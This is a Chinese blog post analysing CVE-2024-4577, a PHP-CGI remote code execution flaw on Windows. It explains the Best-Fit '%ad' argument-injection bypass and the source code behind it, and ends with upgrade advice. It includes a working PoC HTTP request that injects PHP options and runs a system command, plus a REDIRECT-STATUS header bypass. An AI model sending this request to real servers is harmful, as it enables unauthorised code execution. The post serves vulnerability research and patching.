漏洞分析|PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)

已于 2024-06-16 12:06:30 修改
阅读量687 收藏 9
点赞数 4
文章标签: 安全 笔记
于 2024-06-16 11:12:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xuandaoren/article/details/139717191
版权

1.漏洞描述

CVE-2024-4577导致漏洞产生的本质其实是Windows系统内字符编码转换的Best-Fit特性导致的,相对来说PHP在这个漏洞里更像是一个受害者。

PHP语言在设计时忽略了Windows系统内部对字符编码转换的Best-Fit特性,当PHP运行在Window平台且使用了如繁体中文(代码页950)、简体中文(代码页936)和日文(代码页932)等语系时,威胁者可构造恶意请求绕过CVE-2012-1823的保护,通过参数注入等攻击在目标PHP服务器上远程执行代码。

2.影响版本

PHP 8.3 < 8.3.8

PHP 8.2 < 8.2.20

PHP 8.1 < 8.1.29

该漏洞影响安装于Windows系统上的PHP 版本。由于PHP 8.0 分支、PHP 7 以及PHP 5 官方已不再维护

3.影响范围

4.漏洞复现

POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input%20 HTTP/1.1
Host: 127.0.0.1
User-Agent: Opera/9.98.(Windows 98; Win 9x 4.90; fur-IT) Presto/2.9.173 Version/11.00
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
REDIRECT-STATUS: 1
Content-Length: 22

<?php system("dir");?>

5.漏洞分析

看看漏洞利用条件

首先得是Window环境

漏洞是由于Windows系统内字符编码转换的Best-Fit特性导致得所以必须是windows环境,其他不影响

然后由于这个特性,windows正在使用的语言系统是以下三种

繁体中文 (字码页 950)

简体中文 (字码页 936)

日文 (字码页 932)

在poc中用到得特殊字符是%ad,看看%ad是什么

/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input

编码转换的Best-Fit特性会将"%ad "转换成"-"

而"-"发挥得作用是什么,我们看看源码

在新的commit当中还加入了对0x80以上的所有字符的限制来修复这个问题,原本代码中就过滤了"-"符号

上面还有一段注释

如果get发送的请求字符串中不包含”=”,那么Apache就会把请求传到命令行作为cgi的参数。但这会导致恶意请求就可以将命令行参数传递给php,如果直接处理传参,那么会影响到以独立脚本方式运行的PHP脚本。所以只有当开头是-的时候(跳过所有空白符号)才阻止传递参数。

也就是说这个漏洞是绕过CVE-2012-1823的限制

利用Best-Fit特性会将"%ad "转换成"-",导致参数传递没有被阻止,从而利用漏洞

当目标以以CGI模式运行的PHP环境时,配置如下

#
# PHP-CGI setup
#
<FilesMatch "\.php$">
    SetHandler application/x-httpd-php-cgi
</FilesMatch>
<IfModule actions_module>
    Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"
</IfModule>

apache会把请求直接转发给php-cgi。结合上面的特性,你可以通过传%ad来传入一个"-",这样在-之后的部分就会成为php-cgi的参数。

在httpd-xampp.conf中就可以找到这一串代码

访问/php-cgi/路径的时候,会映射D:/xampp/php/下的文件

只有php-cgi.exe是granted的,我们把视角还是回到php-cgi上。

我们直接访问调用php-cgi.exe会有安全警告

我们看看代码

https://github.com/php/php-src/blob/51379d66ec8732e506c43f6c7f1befc500117ae8/sapi/cgi/cgi_main.c#L1897

PHP增加了一个配置叫做cgi.force_redirect=1,开启了这个选项(默认开启)之后,只有经过重定向的规则请求才能执行,不能直接调用执行。

我们得想办法绕过它才能继续执行

在源码中发现REDIRECT_STATUS或HTTP_REDIRECT_STATUS不为空时即可

那我们给REDIRECT-STATUS:1即可绕过这个限制

6.修复建议

目前该漏洞已经修复,受影响用户可升级到PHP版本8.3.8、8.2.20、8.1.29或更高版本。

下载链接:

https://github.com/php/php-src/tags

AttackSatelliteLab
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP-CGI Windows平台远程代码执行漏洞复现(CVE-2024-4577)
0xSec
06-08 2527
2024年6月,PHP官方发布新版本,修复了PHP-CGI中一个远程代码执行漏洞。鉴于该漏洞无前置条件,易于利用,且默认情况下可获取操作系统权限,建议所有使用受影响版本的企业尽快升级修复,以确保安全
PHP-CGI远程代码执行漏洞分析与防范
10-19
本文给大家介绍的是PHP-CGI远程代码执行漏洞CVE-2012-1823)分析和防范,这是最近爆出的一个php的比较严重的漏洞,这里分享给大家。
PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)复现
fly夏天的博客
06-14 856
PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)复现
漏洞复现】CVE-2024-4577PHP CGI Windows平台远程代码执行漏洞
信安百科
06-09 1231
漏洞复现】CVE-2024-4577PHP CGI Windows平台远程代码执行漏洞
CVE-2012-1823)PHP-CGI远程代码执行漏洞(80端口)
m0_62670778的博客
05-12 606
php-cgi是一个类似于消息的“传递者”,它接收web容器收到的http数据包,并把里面的数据交给PHP解释器执行php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互cgi方式:web容器接收到http数据包后,拿到用户请求的文件(cgi脚本),并fork除一个子进程(解释器)去执行这个文件,然后拿到执行结果,直接返回给用户,然后子进程结束,但是这个cgi模式不能接收同时接收大量的请求,因为创建进程的时候会消耗服务器资源,资源也不是无限的,所以有了fastcgi
PHP CGI Windows平台远程代码执行漏洞CVE-2024-4577) 有POC!!!!!
WuYSec的博客
06-07 3543
PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当 PHP-CGI 运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过 CVE-2012-1823 补丁,从而可在无需登陆的情况下执行任意PHP代码
PHP底层原理:CGI、FastCGIPHP-FPM
m0_37486454的博客
03-01 172
在搭建 LAMP/LNMP 服务器时,会经常遇到 CGI、FastCGIPHP-FPM 等等几个相关个概念。如果对它们一知半解,很难搭建出高性能的服务器。本文会以图文的形式,解释这些概念之间的关系。在这之前,先了解一下相关的概念。
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
漏洞复现】PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
qq_48201589的博客
06-10 1075
导致漏洞产生的本质其实是Windows系统内字符编码转换的Best-Fit特性导致的。由于Windows系统内字符编码转换的Best-Fit特性导致PHP原本的安全限制被绕过,再加上一些特殊的PHP CGI环境配置导致了这个问题。目前,官方已发布修复建议,建议受影响的用户尽快升级至安全版本。无需任何配置信息修改。
PHP CGI Windows平台远程代码执行漏洞CVE-2024-4577)复现
huangyongkang666的博客
06-13 573
PHP(Hypertext Preprocessor,超文本预处理器)是一种广泛使用的开源脚本语言,主要用于Web开发,用于生成动态网页内容。PHP的语法借鉴了C、Java、Perl等语言的特点,易于学习,并且可以快速执行漏洞产生的本质其实是Windows系统内字符编码转换的Best-Fit特性导致的,导致未经身份认证的远程攻击者可以通过特定的字符序列绕过此前CVE-2012-1823的防护,通过参数注入攻击在远程PHP服务器上执行任意代码,从而导致远程代码执行
VPS拨号服务器:独享的高效与安全
qq_34245974的博客
07-06 618
本文将深入探讨VPS拨号服务器的独享特性,以及它如何提供更高效的服务和更强的安全保障。总之,VPS拨号服务器的独享特性为用户提供了一个高效、安全且灵活的网络环境,特别适合那些对服务器性能和安全性有高要求的业务需求。随着技术的不断进步,我们有理由相信,VPS拨号服务器将在未来的互联网架构中扮演越来越重要的角色。VPS拨号服务器是一种特殊的服务器,它结合了传统的VPS功能与动态IP地址分配能力。数据隔离:独享服务器保证了数据的隔离性,降低了数据泄露的风险。自定义安全策略:可以根据业务需求实施定制化的安全措施。
绝区肆--2024 年AI安全状况
最新发布
RamendeusStudio的博客
07-07 466
随着人工智能系统变得越来越强大和普及,与之相关的安全问题也越来越多。让我们来看看 2024 年人工智能安全的现状——评估威胁、分析漏洞、审查有前景的防御策略,并推测这一关键领域的未来可能如何。
Conmi的正确答案——ESP32-C3开启安全下载模式
Conmi的博客
07-03 361
IDF版本:4.4.7。
Akamai+Noname强强联合 | API安全再加强
AKAMAI_CHINA的博客
07-03 1116
最近,Akamai正式完成了对Noname Security的收购。本文我们将向大家介绍,经过本次收购后,Akamai在保护API安全性方面的后续计划和未来愿景。Noname Security是市场上领先的API安全供应商之一,此次收购将让Akamai能更好地满足日益增长的客户需求和市场要求。具体来说,Akamai将能借助本次收购扩展API流量方面的情报,满足客户可能提出的,与业务、集成或部署要求有关的任何问题。
FMEA在大型光伏电站安全生产管理中的应用
tianxingjian713的博客
07-03 442
它通过对产品或过程中可能出现的故障模式进行系统性地梳理和分析,评估其可能的影响程度和发生概率,从而制定相应的预防措施和应对措施,以降低故障发生的可能性和影响程度。FMEA在光伏电站安全生产管理中的应用,主要是通过对电站系统、设备和工艺过程进行全面的故障分析,找出潜在的故障模式和影响,进而制定针对性的预防措施,提高电站的安全性和可靠性。然后,针对每个子系统和设备,分析其可能出现的故障模式及其影响,包括故障对电站运行的影响、对人员安全的影响以及对环境的影响等。在评估故障影响的基础上,需要制定相应的预防措施。
[图解]SysML和EA建模住宅安全系统-08-安全企业用例图
rolt的专栏
07-03 693
因为主辅只是针对某个用例而言
WebKit中的安全新纪元:Web Authentication API深度解析
2401_85763639的博客
07-03 714
Web Authentication API是一种新兴的Web标准,旨在使用公钥密码学提供更安全的登录和多因素认证方法。与传统的用户名和密码认证方式相比,WebAuthn提供了一种无密码的认证机制,从而减少了密码泄露和钓鱼攻击的风险。
PHP 远程代码执行漏洞(CVE-2022-31625)修复办法
07-14
针对PHP远程代码执行漏洞(CVE-2022-31625),以下是一些修复方法: 1. 更新到最新版本:确保你的PHP版本是最新的,因为漏洞修复通常会包含在更新中。请访问PHP官方网站或者使用包管理工具来获取最新版本。 2. 禁用危险函数:在php.ini配置文件中,禁用危险函数可以帮助防止远程代码执行。可以使用disable_functions指令来禁用一些敏感函数,如eval()、exec()、system()等。 3. 安全配置:检查你的PHP配置文件,确保安全设置已经启用。例如,禁用动态加载扩展、限制文件上传目录和大小、禁用远程文件包含等。 4. 输入验证和过滤:在你的应用程序中对用户输入进行严格的验证和过滤,以防止恶意代码注入。 5. 使用安全框架或库:使用安全框架或库来帮助防止远程代码执行漏洞。这些框架通常提供安全的默认配置和内置的安全功能。 6. 定期更新和监控:定期检查并更新你的应用程序和相关组件,以确保及时修复已知漏洞。同时,监控应用程序的日志和网络流量,以便及时发现异常行为。 请注意,这些方法只是一些常用的修复措施,具体的修复方法可能会因系统配置和应用程序的特定情况而有所不同。建议在修复漏洞之前,先进行充分的测试和备份。此外,如果你不确定如何处理或无法解决该漏洞,请咨询安全专家或PHP开发人员的帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值